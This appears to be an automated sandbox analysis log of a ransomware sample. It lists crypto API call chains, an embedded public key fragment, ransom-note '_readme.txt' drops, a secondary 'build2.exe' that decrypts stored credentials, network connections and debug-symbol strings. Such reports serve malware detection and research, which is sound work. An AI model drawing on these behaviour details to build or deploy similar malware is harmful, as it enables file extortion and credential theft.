                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00B9EAA0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00BA0FC0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA1178 CryptDestroyHash,CryptReleaseContext,3_2_00BA1178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EA51 CryptDestroyHash,CryptReleaseContext,3_2_00B9EA51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EC68 CryptDestroyHash,CryptReleaseContext,3_2_00B9EC68
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040B920 CryptUnprotectData,LocalAlloc,LocalFree,5_2_0040B920
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00417660 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,5_2_00417660
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040B8A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,5_2_0040B8A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040DB40 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,5_2_0040DB40
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9E70
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeUnpacked PE file: 5.2.build2.exe.400000.0.unpack
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49762 version: TLS 1.2
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310270639.0000000003B32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad589
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\n source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233541682.000000000369B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324270878.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2329014572.0000000003F0B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274901579.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273955613.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275561361.00000000036F7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294571563.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274054462.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\X source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323202530.0000000003FE5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320363197.0000000003FE4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324709500.0000000004014000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323554305.000000000400D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\R source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255826766.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\p source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333358310.000000000407D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\l` source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\b source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2351367972.0000000003C9A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2340729338.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2337425529.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2325051592.000000000403C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332101728.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\VO source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274642389.00000000036C8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275873196.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233489520.00000000036AF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233363954.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\)> source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233541682.000000000369B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324270878.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2329014572.0000000003F0B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323202530.0000000003FE5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320363197.0000000003FE4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324709500.0000000004014000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323554305.000000000400D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
